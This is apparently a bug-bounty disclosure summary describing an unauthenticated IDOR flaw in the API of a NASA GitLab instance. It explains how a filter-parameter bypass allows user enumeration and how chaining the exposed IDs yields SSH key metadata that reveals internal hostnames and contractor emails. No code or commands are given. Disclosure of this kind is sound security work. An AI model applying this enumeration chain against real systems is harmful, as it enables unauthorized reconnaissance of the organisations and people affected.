Summary by ghaddarittoo
An unauthenticated Insecure Direct Object Reference (IDOR) vulnerability was identified in the API of NASA's restricted self-hosted GitLab instance at gitlab.smce.nasa.gov. The instance was configured as private, with the base users API endpoint correctly returning 403 Forbidden to unauthenticated requests.
However, a filter parameter bypass allowed unauthenticated users to enumerate any user account on the instance, retrieving internal user IDs and account metadata. By chaining the exposed user IDs with a separate unauthenticated API endpoint, an attacker could retrieve SSH key metadata for any enumerated user, including key titles containing sensitive information such as internal workstation hostnames, Fully Qualified Domain Names pointing to NASA Data Center infrastructure, and contractor email addresses.